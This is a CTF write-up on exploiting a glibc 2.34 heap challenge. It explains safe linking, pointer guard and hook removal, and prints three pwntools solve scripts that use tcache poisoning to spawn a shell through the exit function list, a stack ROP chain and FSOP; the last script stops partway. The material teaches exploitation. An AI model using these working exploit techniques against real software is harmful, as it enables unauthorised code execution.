This challenge is a fairly standard heap challenge. The binary provides the standard four functions:

- Allocate an arbitrary sized chunk (it seems to state that up to 100 chunks can be allocated, but this isn't checked anywhere)
- Free a previously allocated chunk. The pointer to the chunk is not zeroed, so we have UAF/double free here.
- Edit a previously allocated chunk. We can edit the metadata of a freed chunk to achieve arbitrary read/write.
- View the contents of a previously allocated chunk. We can use this to leak libc (via unsorted bin pointers) and heap (via tcache pointers)
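As a rough illustration of the last point, the bytes printed by the view function can be unpacked into an integer and rebased. This is only a sketch: `leak_to_int` and `libc_base_from_unsorted` are hypothetical helper names, and the `0x1f2cc0` offset is the one the solve scripts in this writeup use for this particular libc build.

```python
import struct

# Offset of the leaked unsorted bin pointer from the libc base.
# Taken from the solve scripts in this writeup; specific to this libc build.
UNSORTED_BIN_OFFSET = 0x1F2CC0


def leak_to_int(raw: bytes) -> int:
    """Zero-extend a leaked little-endian pointer (usually 6 bytes) to 64 bits."""
    return struct.unpack("<Q", raw[:8].ljust(8, b"\x00"))[0]


def libc_base_from_unsorted(raw: bytes) -> int:
    """Rebase a leaked unsorted bin pointer to the start of libc."""
    return leak_to_int(raw) - UNSORTED_BIN_OFFSET


if __name__ == "__main__":
    # Sample bytes for the address 0x7f1d52750cc0 (the value that appears
    # in one of the solve scripts), as they would be printed by the binary.
    sample = bytes.fromhex("c00c75521d7f")
    print(hex(libc_base_from_unsorted(sample)))
```

A quick sanity check is that the resulting base should be page aligned (its low 12 bits are zero).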

Seems fairly standard, right? I've written writeups about these kinds of heap challenges [here](https://api.ctflib.junron.dev/share/writeup/gradebook-13). The twist here is the challenge runs glibc 2.34, which includes several mitigations that make the techniques detailed in the previous writeup impossible.

Thus, this writeup will explore the mitigations introduced after glibc 2.31 and several methods to bypass them.

## Safe linking

In regular tcache poisoning, we can freely overwrite tcache pointers to achieve arbitrary read/write. In glibc 2.32, safe linking was introduced to "encrypt" the pointers in the tcache and fastbins to make it more difficult to manipulate these pointers. The code for encrypting the pointer can be found [here](https://elixir.bootlin.com/glibc/glibc-2.34/source/malloc/malloc.c#L350):

```c
#define PROTECT_PTR(pos, ptr) \
((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr) PROTECT_PTR (&ptr, ptr)
```

`pos` is the address where the pointer will be stored, and `ptr` is the pointer. Essentially the pointer is XORed with the page number of the page it is stored in. Since most of the pointers we are concerned about will be stored in the heap, we just need to leak the page number of one of the chunks in the heap. This is easy as we can just leak the (encrypted) tcache pointers and do some math to recover the original pointer:

```py
def deobfuscate(val):
    mask = 0xfff << 52
    while mask:
        v = val & mask
        val ^= (v >> 12)
        mask >>= 12
    return val
```

(Code from [here](https://ctftime.org/writeup/34804))

Once we have obtained the original pointer, we can just XOR it with the encrypted value to recover the key.
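To make the round trip concrete, here is a minimal sketch of safe linking in Python. The names `protect` and `reveal` are my own stand-ins for the two macros, and all addresses are made up. Note the assumption baked into `deobfuscate`: it only works when the pointer and the location it is stored at lie on the same page.

```python
PAGE_SHIFT = 12


def protect(pos: int, ptr: int) -> int:
    """Python stand-in for PROTECT_PTR: XOR ptr with the page number of pos."""
    return (pos >> PAGE_SHIFT) ^ ptr


def reveal(pos: int, enc: int) -> int:
    """Python stand-in for REVEAL_PTR; XOR is its own inverse."""
    return protect(pos, enc)


def deobfuscate(val: int) -> int:
    """Recover ptr from protect(pos, ptr) without knowing pos.

    Assumes pos and ptr are on the same page (pos >> 12 == ptr >> 12).
    """
    mask = 0xFFF << 52
    while mask:
        val ^= (val & mask) >> 12
        mask >>= 12
    return val


if __name__ == "__main__":
    pos = 0x55555555B2A0  # made-up address of a freed chunk's next field
    ptr = 0x55555555B2C0  # made-up address of the next free chunk (same page)
    enc = protect(pos, ptr)
    assert reveal(pos, enc) == ptr
    assert deobfuscate(enc) == ptr

    # XORing the recovered pointer with the leak yields the key (pos >> 12).
    key = enc ^ deobfuscate(enc)
    assert key == pos >> PAGE_SHIFT

    # The last entry of a bin stores NULL, so its leak is the key itself.
    assert protect(pos, 0) == pos >> PAGE_SHIFT

    # Poisoning: the value to write so that the allocator later sees `target`.
    target = 0x7FFFF7DD0000
    assert reveal(pos, protect(pos, target)) == target
    print("key:", hex(key))
```

The NULL case is the shortcut one of the later solve scripts takes: the leak from the first freed chunk is shifted left by 12 to get the heap base directly.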

## Removal of hooks

Glibc 2.34 removed `__malloc_hook` and `__free_hook`, two important hooks that allowed us to obtain `$rip` control with a single arbitrary write.

There are actually multiple approaches to bypass this protection. I will discuss the method I used, as well as two other methods I have seen in others' solve scripts:

- The method I used: writing to `exit_function_list` (based on [here](https://ctftime.org/writeup/34804) with tweaks)
- The method used by Triacontakai of ViewSource: leak stack + ROP
- The method used by the challenge author: File stream oriented programming

## Exit function list

Note: this technique is heavily based on [this writeup](https://ctftime.org/writeup/34804)

Similarly to `__malloc_hook`, the `__exit_funcs` variable in glibc contains information about what functions to call when a certain operation occurs, in this case on program exit.

The [`__exit_funcs`](https://elixir.bootlin.com/glibc/glibc-2.34/source/stdlib/cxa_atexit.c#L76) variable points to an [`exit_function_list`](https://elixir.bootlin.com/glibc/glibc-2.34/source/stdlib/exit.h#L55) struct, which in turn contains [`exit_function`](https://elixir.bootlin.com/glibc/glibc-2.34/source/stdlib/exit.h#L34)s.

```c
struct exit_function
{
  /* `flavour' should be of type of the `enum' above but since we need
     this element in an atomic operation we have to use `long int'. */
  long int flavor;
  union
  {
    void (*at) (void);
    struct
    {
      void (*fn) (int status, void *arg);
      void *arg;
    } on;
    struct
    {
      void (*fn) (void *arg, int status);
      void *arg;
      void *dso_handle;
    } cxa;
  } func;
};
```

There are three different types of `exit_function` (`at`, `on` and `cxa`). Since our goal is to call `system("/bin/sh")`, the `cxa` variant seems most applicable as the first argument is a pointer. The 'flavor' is represented by the number 4.

Fortunately, the [default `exit_function_list`](https://elixir.bootlin.com/glibc/glibc-2.34/source/stdlib/cxa_atexit.c#L75) is at a constant offset in libc, so we can simply allocate a chunk there and overwrite the `fn` pointer, right?

(Un)fortunately, glibc has implemented an additional protection: pointer guard. This sounds similar to the safe linking mechanism but relies on a secret key instead of the memory location of the pointer to be encrypted.

The mangling is implemented [here](https://elixir.bootlin.com/glibc/glibc-2.34/source/sysdeps/unix/sysv/linux/x86_64/sysdep.h#L406) (the `PTR_MANGLE` macro), and the linked writeup reimplements it in Python as:

```py
# The shifts are copied from the above blogpost
# Rotate left: 0b1001 --> 0b0011
rol = lambda val, r_bits, max_bits: \
    (val << r_bits%max_bits) & (2**max_bits-1) | \
    ((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))

# encrypt a function pointer
def encrypt(v, key):
    return p64(rol(v ^ key, 0x11, 64))
```

The key is actually stored in memory in the [thread control block (TCB)](https://elixir.bootlin.com/glibc/glibc-2.34/source/sysdeps/x86_64/nptl/tls.h#L52), the same place that stack canaries are stored:

```c
typedef struct
{
  void *tcb;            /* Pointer to the TCB. Not necessarily the
                           thread descriptor used by libpthread. */
  dtv_t *dtv;
  void *self;           /* Pointer to the thread descriptor. */
  int multiple_threads;
  int gscope_flag;
  uintptr_t sysinfo;
  uintptr_t stack_guard;
  uintptr_t pointer_guard; // <------ this is the field we are interested in
  unsigned long int unused_vgetcpu_cache[2];
  /* Bit 0: X86_FEATURE_1_IBT.
     Bit 1: X86_FEATURE_1_SHSTK.
   */
  unsigned int feature_1;
  int __glibc_unused1;
  /* Reservation of some values for the TM ABI. */
  void *__private_tm[4];
  /* GCC split stack support. */
  void *__private_ss;
  /* The lowest address of shadow stack, */
  unsigned long long int ssp_base;
  /* Must be kept even if it is no longer used by glibc since programs,
     like AddressSanitizer, depend on the size of tcbhead_t. */
  __128bits __glibc_unused2[8][4] __attribute__ ((aligned (32)));

  void *__padding[8];
} tcbhead_t;
```
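As a small sanity check on the struct above, the offsets of the two guard fields can be computed by summing the sizes of the members that precede them. This sketch assumes the x86-64 sizes (8-byte pointers and `uintptr_t`, 4-byte `int`); no padding is needed before the guards because the two `int` members together fill one 8-byte slot.

```python
import struct

# Members of tcbhead_t in declaration order, up to the guards:
#   tcb, dtv, self                 -> 3 pointers  (3Q)
#   multiple_threads, gscope_flag  -> 2 ints      (2i)
#   sysinfo                        -> 1 uintptr_t (Q)
#   stack_guard                    -> 1 uintptr_t (Q)
# "<" disables automatic padding, which is fine here (see the note above).
stack_guard_offset = struct.calcsize("<3Q2iQ")
pointer_guard_offset = struct.calcsize("<3Q2i2Q")

print(hex(stack_guard_offset), hex(pointer_guard_offset))  # 0x28 0x30
```

On x86-64 the TCB is addressed through the `fs` segment register, so these correspond to `fs:0x28` (the stack canary) and `fs:0x30` (the pointer guard).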

After some searching with GDB, I found the offset of the TCB from the libc address.

From here, I used the previously established arbitrary write primitive to zero out the `pointer_guard`. Fortunately, the address was 16 byte aligned so there was no problem allocating a chunk there.

With the pointer guard key zeroed out, we just need to rotate the address of `system` left by `0x11` bits to pass the pointer mangling. Now we can write this 'mangled' address to the `fn` field of the `exit_function` struct and set `arg` to a pointer to `/bin/sh` (a chunk I allocated on the heap). Thus, `system("/bin/sh")` is called when the program exits.
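The bytes written over the default list can be sketched as follows. This assumes the `exit_function_list` layout from `exit.h` (a `next` pointer, an `idx` count, then the array of `exit_function` entries); `build_exit_list` is a hypothetical helper and the addresses in the usage example are made up.

```python
import struct

MASK64 = (1 << 64) - 1
EF_CXA = 4  # flavor value for the cxa variant


def rol64(value: int, bits: int) -> int:
    """Rotate a 64-bit value left by `bits`."""
    value &= MASK64
    bits %= 64
    return ((value << bits) | (value >> (64 - bits))) & MASK64


def build_exit_list(fn_addr: int, arg_addr: int, guard: int = 0) -> bytes:
    """Fake exit_function_list holding a single cxa entry.

    Layout: next, idx, then fns[0] = {flavor, fn, arg, dso_handle}.
    """
    mangled_fn = rol64(fn_addr ^ guard, 0x11)
    return struct.pack(
        "<6Q",
        0,           # next: no further lists
        1,           # idx: one registered function
        EF_CXA,      # fns[0].flavor
        mangled_fn,  # fns[0].func.cxa.fn, mangled with the pointer guard
        arg_addr,    # fns[0].func.cxa.arg, passed as the first argument
        0,           # fns[0].func.cxa.dso_handle
    )


if __name__ == "__main__":
    # Made-up addresses standing in for system() and the "/bin/sh" chunk.
    payload = build_exit_list(0x7FFFF7E12345, 0x55555555C1C0)
    print(len(payload), payload.hex())
```

With `guard` left at zero, the mangling reduces to the plain rotation described above.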

The drawback is that this requires two writes, which is somewhat more complicated than traditional heap UAF pwn. The original writeup instead recovers the key by leaking the mangled `fn` value, which is known to correspond to `_dl_fini`. In this case, however, the address of `fn` was not 16-byte aligned, so we cannot allocate a chunk at that address. Allocating a chunk 8 bytes before the desired address and filling those 8 bytes with padding does not work either, as `fgets` appends a null terminator to the written string. If `read` were used instead, this technique would be feasible and would require only one fake chunk.
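For reference, the key recovery used by the original writeup is a known-plaintext attack on the mangling. The sketch below uses made-up values and my own function names; it only models the arithmetic, not the leak itself.

```python
MASK64 = (1 << 64) - 1


def rol64(value: int, bits: int) -> int:
    """Rotate a 64-bit value left by `bits`."""
    value &= MASK64
    bits %= 64
    return ((value << bits) | (value >> (64 - bits))) & MASK64


def ror64(value: int, bits: int) -> int:
    """Rotate a 64-bit value right by `bits`."""
    return rol64(value, 64 - (bits % 64))


def mangle(ptr: int, guard: int) -> int:
    """XOR with the pointer guard, then rotate left by 0x11."""
    return rol64(ptr ^ guard, 0x11)


def demangle(mangled: int, guard: int) -> int:
    """Inverse of mangle(): rotate right by 0x11, then XOR with the guard."""
    return ror64(mangled, 0x11) ^ guard


def recover_guard(mangled: int, known_ptr: int) -> int:
    """Known-plaintext recovery: leak a mangled pointer whose target is known."""
    return ror64(mangled, 0x11) ^ known_ptr


if __name__ == "__main__":
    guard = 0x1122334455667788  # made-up secret
    dl_fini = 0x7FFFF7FC9040    # made-up address standing in for _dl_fini
    leaked = mangle(dl_fini, guard)
    assert recover_guard(leaked, dl_fini) == guard
    assert demangle(leaked, guard) == dl_fini
    print(hex(recover_guard(leaked, dl_fini)))
```

Once the guard is known, any function pointer can be mangled correctly without touching the TCB, which is why that approach needs only one fake chunk.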

```py
from pwn import *

e = ELF("./chal")
libc = ELF("libc.so.6", checksec=False)
ld = ELF("ld-linux-x86-64.so.2", checksec=False)
context.binary = e

def setup():
    p = e.process()
    return p

def alloc(p, i, size, s):
    p.recvuntil(">")
    p.sendline("1")
    p.recvuntil("index")
    p.sendline(str(i))
    p.recvuntil("big")
    p.sendline(str(size))
    p.recvuntil("payload")
    p.sendline(s)

def edit(p, i, s):
    p.recvuntil(">")
    p.sendline("3")
    p.recvuntil("index")
    p.sendline(str(i))
    p.recvuntil("contents")
    p.sendline(s)

def free(p, i):
    p.recvuntil(">")
    p.sendline("2")
    p.recvuntil("index")
    p.sendline(str(i))

def view(p, i):
    p.recvuntil(">")
    p.sendline("4")
    p.recvuntil("index")
    p.sendline(str(i))
    p.recvline()
    return p.recvline(keepends=False)[2:]

# Undo safe linking nibble by nibble, from the top of the pointer down
def defu(p):
    d = 0
    for i in range(0x100,0,-4):
        pa = (p & (0xf << i )) >> i
        pb = (d & (0xf << i+12 )) >> i+12
        d |= (pa ^ pb) << i
    return d

# Apply safe linking: p is the target pointer, adr is where it will be stored
def obfuscate(p, adr):
    return p^(adr>>12)

rol = lambda val, r_bits, max_bits: \
    (val << r_bits%max_bits) & (2**max_bits-1) | \
    ((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))

if __name__ == '__main__':
    p = setup()

    for i in range(2):
        alloc(p, i, 30, str(i))

    for i in range(2,4):
        alloc(p, i, 100, str(i))
    alloc(p, 5, 0x1000, b"unsort")
    alloc(p, 6, 100, b"buffer")
    alloc(p, 7, 100, b"/bin/sh")
    for i in range(6):
        free(p, i)
    # Heap leak from the (obfuscated) tcache pointer
    l = view(p,1)
    l = defu(u64(l+b"\0\0"))

    # libc leak from the unsorted bin pointer
    libc_leak = u64(view(p, 5)+b"\0\0")
    libc.address = libc_leak - 0x1f2cc0
    print(hex(libc.address))

    # First write: zero out the pointer guard at fs:0x30
    target_heap_addr = l + 30
    # Location where fs:0x30 is stored
    target_addr = libc.address - 0x2890
    edit(p, 1, p64(obfuscate(target_addr, target_heap_addr)))

    alloc(p, 0, 30, b"aa")
    # Write fs:0x30
    alloc(p, 0, 30, b"\0"*20)

    # Second write: overwrite the default exit_function_list
    target_heap_addr2 = l + 0xd0
    target_addr2 = libc.address + 0x1f4bc0
    edit(p, 3, p64(obfuscate(target_addr2, target_heap_addr2)))
    alloc(p, 0, 100, b"aa")
    bin_sh = l + 0x11c0
    # next = NULL, idx = 1, flavor = 4 (cxa), fn, arg, dso_handle
    onexit_fun = p64(0) + p64(1) + p64(4) +p64(rol(libc.sym.system, 0x11, 64)) + p64(bin_sh) + p64(0)
    alloc(p, 0, 100, onexit_fun)

    # exit
    p.sendline("5")
    p.sendline("id")

    p.interactive()
```

## Stack leak + ROP

This technique was used by `Triacontakai` in https://discord.com/channels/820012263845920768/823257424088924201/1036404972130152478.

This is perhaps the simplest of the methods detailed here, but also requires two fake chunks.

First, the glibc `environ` symbol is leaked. This symbol holds a stack address: the value of `main`'s third argument, `char **envp`, which points to the environment array on the stack.

This is actually nontrivial. The author allocates chunks of data size 24 bytes, which produces chunks of size 0x20. This is the smallest possible glibc heap chunk size.

Next, the author performs the typical tcache poisoning attack. However, instead of allocating chunks of size 24, the author allocates chunks of data size 0. As 0x20 is the smallest chunk size, `malloc(0)` returns chunks from the `0x20` size tcache. However, `0` is also the size passed to `fgets`, so no data is written to the target `environ` chunk, not even the null byte, allowing its value to be read subsequently.
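The size-class arithmetic behind this trick can be sketched in Python. This mirrors glibc's `request2size` macro under the usual x86-64 constants (`SIZE_SZ = 8`, 16-byte alignment, `MINSIZE = 0x20`), which I am assuming apply to this build.

```python
SIZE_SZ = 8               # size of the chunk size field on x86-64
MALLOC_ALIGN_MASK = 0xF   # chunks are 16-byte aligned
MINSIZE = 0x20            # smallest possible chunk


def request2size(req: int) -> int:
    """Chunk size that malloc(req) is served from."""
    size = (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK
    return max(size, MINSIZE)


if __name__ == "__main__":
    for req in (0, 24, 25, 0x40 - 8, 0x368, 0x378):
        print(f"malloc({req:#x}) -> chunk size {request2size(req):#x}")
```

Both `malloc(0)` and `malloc(24)` map to the `0x20` bin, which is what lets a zero-sized request pull the poisoned entry out of the tcache.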

Once the `environ` is leaked, the author calculates a target chunk so that when `malloc` is called in `menu_malloc`, it returns a pointer to the saved `rip` of the function. This allows the author to write their ROP 'ret2libc' payload, while bypassing the stack guard completely.
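One detail worth spelling out: since glibc 2.32, `malloc` aborts if a tcache entry is not 16-byte aligned, so the fake chunk cannot always start exactly at the saved return address. My reading of the solve script below is that this is why it subtracts an extra 8 from the target and prepends 8 bytes of padding to the ROP chain. The helper name and the leak value in this sketch are hypothetical; the `336` offset is the one from the script.

```python
def split_target(addr: int, align: int = 16):
    """Return (chunk_addr, padding) so that chunk_addr is aligned and
    chunk_addr + padding == addr."""
    chunk_addr = addr & ~(align - 1)
    return chunk_addr, addr - chunk_addr


if __name__ == "__main__":
    environ_leak = 0x7FFD1234E5A8      # made-up stack leak
    saved_rip = environ_leak - 336     # offset taken from the solve script
    chunk_addr, padding = split_target(saved_rip)
    print(hex(chunk_addr), padding)
    payload = b"A" * padding           # followed by the ROP chain
```

For this made-up leak the padding comes out as 8 bytes, matching the `b'A' * 8` at the start of the script's payload.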

Their solve script is reproduced below:

```py
import re
import sys
from pwn import *

path = './pwnme'
host = '0.cloud.chals.io'
port = 10605

libc = ELF('./libc.so.6')

if len(sys.argv) > 1:
    p = gdb.debug(path, '''
        c
    ''', api=True, aslr=True)
else:
    p = remote(host, port)

def b():
    p.gdb.interrupt_and_wait()
    input("press any key to resume")

def numb(num):
    return str(num).encode('ascii')

def alloc(idx, size, data):
    p.sendlineafter(b'> ', b'1')
    p.sendlineafter(b'> ', numb(idx))
    p.sendlineafter(b'> ', numb(size))
    p.sendlineafter(b'> ', data)

def delete(idx):
    p.sendlineafter(b'> ', b'2')
    p.sendlineafter(b'> ', numb(idx))

def edit(idx, data):
    p.sendlineafter(b'> ', b'3')
    p.sendlineafter(b'> ', numb(idx))
    p.sendlineafter(b'> ', data)

def view(idx):
    p.sendlineafter(b'> ', b'4')
    p.sendlineafter(b'> ', numb(idx))
    return p.recvuntil(b'You are', drop=True)

# allocate unsorted bin chunk for libc leak
alloc(0, 0x420, b'AAAAAAAA')

# allocate tcache size chunk for heap leak
# this also prevents unsorted bin chunk from coalescing on free
alloc(1, 24, b'BBBBBBBB')

# allocate another 0x20 size chunk for poisoning later
alloc(2, 24, b'CCCCCCCC')

# free 0x20 size chunks into tcache
# looks like this:
# [2] -> [1]
delete(1)
delete(2)

# free unsorted bin size chunk to put libc address
delete(0)

# get heap leak
leak = u64(view(1)[:-1].ljust(8, b'\x00'))
heap = leak << 12
log.info(f"heap base: 0x{heap:x}")

# get libc leak
leak = u64(view(0)[:-1].ljust(8, b'\x00'))
libc.address = leak - (0x7f1d52750cc0 - 0x7f1d5255e000)
log.info(f"libc base: 0x{libc.address:x}")

# do tcache poisoning
mask = heap >> 12
edit(2, p64(mask ^ libc.symbols['environ']))

# allocate two chunks
# second chunk will be environ chunk
alloc(2, 0, b'')
alloc(2, 0, b'')

# get stack leak
stack = u64(view(2)[:-1].ljust(8, b'\x00'))
log.info(f"stack leak: 0x{stack:x}")

# offset stack leak to return address location
stack -= 336 + 8

# do poisoning again to get write on stack woohoo im having so much fun
alloc(1, 0x40-8, b'')
alloc(2, 0x40-8, b'')
delete(1)
delete(2)
edit(2, p64(mask ^ stack))

pop_rdi = libc.address + 0x000000000002daa2
binsh = next(libc.search(b'/bin/sh\x00'))

payload = b'A' * 8
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(libc.symbols['system'])

alloc(2, 0x40-8, b'')
alloc(2, 0x40-8, payload)

p.interactive()
```

## File stream oriented programming

This is the technique used by the challenge author. In my opinion, it is far more complicated than the other two techniques.

It still requires two fake chunks, and requires editing one of the chunks twice. The chunks sizes allocated are also quite large. After so much trouble, I'm not sure what the advantages of this method are over the others.

Anyway, I've done some FSOP [here](https://api.ctflib.junron.dev/share/writeup/manipulation-57), but this is significantly more complex.

To summarize, each file stream (like `stdout`) has an [`_IO_FILE_plus`](https://elixir.bootlin.com/glibc/glibc-2.34/source/libio/libioP.h#L324) struct which contains a [`_IO_FILE`](https://elixir.bootlin.com/glibc/glibc-2.34/source/libio/bits/types/struct_FILE.h#L49) and a pointer to a vtable. By manipulating the function pointers in the vtable, we can control RIP. The attack then pops a shell via a one gadget.

This method is similar to that, except the one gadgets we have in this libc have fairly strict conditions, and I couldn't find a function pointer that I could overwrite with a one gadget that would work.

The challenge author uses [`_IO_OVERFLOW`](https://elixir.bootlin.com/glibc/glibc-2.34/source/libio/libioP.h#L146), which is called by [`_IO_flush_all_lockp`](https://elixir.bootlin.com/glibc/glibc-2.34/source/libio/genops.c#L685) on process exit as part of the cleanup process.

Unfortunately, `_IO_flush_all_lockp` will be called whenever file streams are flushed, which as it turns out is quite a lot.

However, `_IO_OVERFLOW` is only called if specific conditions are met:

```c
if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
     || (_IO_vtable_offset (fp) == 0
         && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
                              > fp->_wide_data->_IO_write_base))
     )
    && _IO_OVERFLOW (fp, EOF) == EOF)
```

`_IO_OVERFLOW` will only be called if either of the first two conditions in the if statement return true.

To start, the author allocates a large fake chunk over `_IO_2_1_stdout_`. Using this fake chunk, they modify `fp->_mode` to be greater than 0, and `fp->_IO_write_ptr` to be greater than `fp->_IO_write_base`.

The second branch of the if statement (the one requiring `fp->_mode > 0`) will not be satisfied, as `fp->_wide_data->_IO_write_ptr == fp->_wide_data->_IO_write_base == 0`.

Thus, by setting `fp->_mode > 0`, premature execution of `_IO_OVERFLOW` is prevented. Unfortunately, this also causes output to be disabled.
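To see where these fields sit in the fake chunk, the sketch below lays out `struct _IO_FILE` for x86-64 using natural alignment. The field list is my transcription of `struct_FILE.h` and the `layout` helper is hypothetical; treat the result as a cross-check rather than a reference.

```python
def layout(fields):
    """Return ({name: offset}, total_size) for (name, size, align) tuples."""
    offsets, cursor = {}, 0
    for name, size, align in fields:
        cursor = (cursor + align - 1) & ~(align - 1)  # pad up to alignment
        offsets[name] = cursor
        cursor += size
    return offsets, cursor


POINTER_FIELDS = [
    "_IO_read_ptr", "_IO_read_end", "_IO_read_base",
    "_IO_write_base", "_IO_write_ptr", "_IO_write_end",
    "_IO_buf_base", "_IO_buf_end",
    "_IO_save_base", "_IO_backup_base", "_IO_save_end",
    "_markers", "_chain",
]

IO_FILE_FIELDS = (
    [("_flags", 4, 4)]
    + [(name, 8, 8) for name in POINTER_FIELDS]
    + [
        ("_fileno", 4, 4), ("_flags2", 4, 4), ("_old_offset", 8, 8),
        ("_cur_column", 2, 2), ("_vtable_offset", 1, 1), ("_shortbuf", 1, 1),
        ("_lock", 8, 8), ("_offset", 8, 8), ("_codecvt", 8, 8),
        ("_wide_data", 8, 8), ("_freeres_list", 8, 8),
        ("_freeres_buf", 8, 8), ("__pad5", 8, 8),
        ("_mode", 4, 4), ("_unused2", 20, 1),
    ]
)

OFFSETS, IO_FILE_SIZE = layout(IO_FILE_FIELDS)

if __name__ == "__main__":
    for name in ("_flags", "_IO_write_base", "_IO_write_ptr",
                 "_wide_data", "_mode"):
        print(f"{name:16s} {OFFSETS[name]:#x}")
    # The vtable pointer of _IO_FILE_plus follows the _IO_FILE directly.
    print(f"{'vtable':16s} {IO_FILE_SIZE:#x}")
```

This matches the solve script at the end of this section: an 8-byte `_flags` value followed by the 23 quadwords of `stdout_FILE` is `0xc0` bytes, so the `p32` that follows lands exactly on `_mode`.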

Next, the author allocates another large chunk on `__GI__IO_file_jumps`, the [file vtable](https://elixir.bootlin.com/glibc/glibc-2.34/source/libio/libioP.h#L293). The author modifies the `__overflow` field to the one gadget address. However, since the first argument of `_IO_OVERFLOW` is the file pointer, which we have write access to, I decided to use `system`, instead of a one gadget.
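The position of `__overflow` inside the vtable follows from the field order of `struct _IO_jump_t`. The list below is my transcription of that order from `libioP.h`, and `vtable_offset` is a hypothetical helper; each slot is 8 bytes on x86-64.

```python
JUMP_FIELDS = [
    "__dummy", "__dummy2", "__finish", "__overflow", "__underflow",
    "__uflow", "__pbackfail", "__xsputn", "__xsgetn", "__seekoff",
    "__seekpos", "__setbuf", "__sync", "__doallocate", "__read",
    "__write", "__seek", "__close", "__stat", "__showmanyc", "__imbue",
]


def vtable_offset(name: str) -> int:
    """Byte offset of a slot inside the vtable (8 bytes per slot)."""
    return JUMP_FIELDS.index(name) * 8


if __name__ == "__main__":
    print(hex(vtable_offset("__overflow")))  # 0x18
    print(hex(len(JUMP_FIELDS) * 8))         # 0xa8
```

So a write that starts at the beginning of the vtable needs two dummy quadwords and the `__finish` pointer before the replacement for `__overflow`, which is the shape of the `gi_jump` payload in the script below.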

Once the vtable is manipulated, I modified the `_IO_2_1_stdout_` object again to set the `_flags` field to `/bin/sh`. Since `_flags` is at the start of the file object, when `_IO_OVERFLOW` is called, `_flags` will be the string that is passed to `system`. We could not do this beforehand as messing up the file flags would cause a crash. The `fp->_mode` field is set to `-1` so that the checks can pass and allow `_IO_OVERFLOW` to be called.

Now, all that's left is to command the process to exit and `system(_IO_2_1_stdout_)` will be called, which is equivalent to `system("/bin/sh")`.
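The two stages of the attack can be checked against a small Python model of the condition shown earlier. This is only a model of that one `if` statement, with hypothetical parameter names and made-up pointer values.

```python
def overflow_is_called(mode, write_ptr, write_base,
                       wide_write_ptr=0, wide_write_base=0,
                       vtable_offset=0):
    """Model of the check guarding _IO_OVERFLOW in _IO_flush_all_lockp."""
    narrow = mode <= 0 and write_ptr > write_base
    wide = (vtable_offset == 0 and mode > 0
            and wide_write_ptr > wide_write_base)
    return narrow or wide


if __name__ == "__main__":
    base = 0x7FFFF7FA2803  # made-up buffer address

    # Stage 1: _mode = 2 and write_ptr > write_base, wide pointers both 0.
    # Neither branch holds, so the hijacked vtable entry is not reached yet.
    print(overflow_is_called(mode=2, write_ptr=base + 1, write_base=base))

    # Final stage: _mode = -1 with the same pointers. The first branch
    # holds, so _IO_OVERFLOW(fp, EOF) runs when the process exits.
    print(overflow_is_called(mode=-1, write_ptr=base + 1, write_base=base))
```

The first call prints `False` and the second prints `True`, which is the arm-then-trigger behaviour described above.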

Modified solve script:

```py
from pwn import *
from time import sleep
import re

p=process("./chal")
libc = ELF("./libc.so.6")
elf=ELF("./chal")

def malloc(ind, size, payload):
    global p
    r1 = p.sendlineafter(b">", "1")
    r2 = p.sendlineafter(b">", str(ind))
    r3 = p.sendlineafter(b">", str(size))
    r4 = p.sendlineafter(b">",payload)
    return r1+r2+r3+r4

def malloc_no_out(ind, size, payload):
    global p
    sleep(1)
    p.sendline("1")
    sleep(1)
    p.sendline(str(ind))
    sleep(1)
    p.sendline(str(size))
    sleep(1)
    p.sendline(payload)

def free(ind):
    global p
    r1 = p.sendlineafter(b">", "2")
    r2 = p.sendlineafter(b">", str(ind))
    return r1 + r2

def free_no_out(ind):
    global p
    sleep(1)
    p.sendline("2")
    sleep(1)
    p.sendline(str(ind))
    sleep(1)

def edit(ind, payload):
    global p
    r1 = p.sendlineafter(b">","3")
    r2 = p.sendlineafter(b">",str(ind))
    r3 = p.sendlineafter(b">",payload)
    return r1+r2+r3

def edit_no_out(ind, payload):
    global p
    sleep(1)
    p.sendline("3")
    sleep(1)
    p.sendline(str(ind))
    sleep(1)
    p.sendline(payload)

def view(ind):
    global p
    r1 = p.sendlineafter(b">", "4")
    r2 = p.sendlineafter(b">", str(ind))
    leak = p.recvuntil(b"addresses.")
    return leak

def raw2leak(resp):
    leakr=resp[1:].split(b"\n")[0]
    return u64(leakr.ljust(8, b'\x00'))

def decrypt(leak):
    key=0
    res=0
    for i in range(1,6):
        bits=64-12*i
        if bits < 0:
            bits = 0
        res = ((leak ^ key) >> bits) << bits
        key = res >> 12
    return res

#GOAL 0: make a glibc leak by creating an unsorted size then a buffer chunk and freeing the big one:
print(malloc(50, 0x420, "hi there"))
print(malloc(51, 24, "smol"))
print(free(50))
raw = view(50)
leakr=raw[1:].split(b"\n")[0]
glibcleak = u64(leakr.ljust(8, b'\x00'))
libc.address = glibcleak - (libc.sym.main_arena+96)
one_gadget = 0xda811 + libc.address
filler = libc.sym._IO_2_1_stdout_ - 131
stdout_FILE = (p64(filler)*4
+ p64(filler + 1)*2
+ p64(filler)
+ p64(filler + 1)
+ p64(0)*4
+ p64(libc.sym._IO_2_1_stdin_)
+ p64(1)
+ p64(0xffffffffffffffff)
+ p64(0x0)
+ p64(libc.sym._IO_stdfile_1_lock)
+ p64(0xffffffffffffffff)
+ p64(0)
+ p64(libc.sym._IO_wide_data_1)
+ p64(0x0)*3 )

#OK targeting _IO_2_1_stdout_ -16 or -32

malloc(0, 0x368, "chunk0")
malloc(1, 0x368, "chunk1")
malloc(2, 0x378, "chunk2")
malloc(3, 0x378, "chunk3")
malloc(4, 24, "smol2")
free(0)
free(1)
free(2)
free(3)
print("commencing heap leak")
heapleap = decrypt(raw2leak(view(1)))
heapleap = (heapleap >> 12) << 12
print(hex(heapleap))
print("target stdout", hex(libc.sym._IO_2_1_stdout_))
print("target file jumps", hex(libc.sym.__GI__IO_file_jumps))
edit(1, p64( (libc.sym._IO_2_1_stdout_) ^ (heapleap >> 12)) + p64(heapleap) )
edit_no_out(3, p64( (libc.sym.__GI__IO_file_jumps) ^ (heapleap >> 12)) + p64(heapleap) )

malloc(5, 0x368, "junk")
malloc(6, 0x378, "junk2")
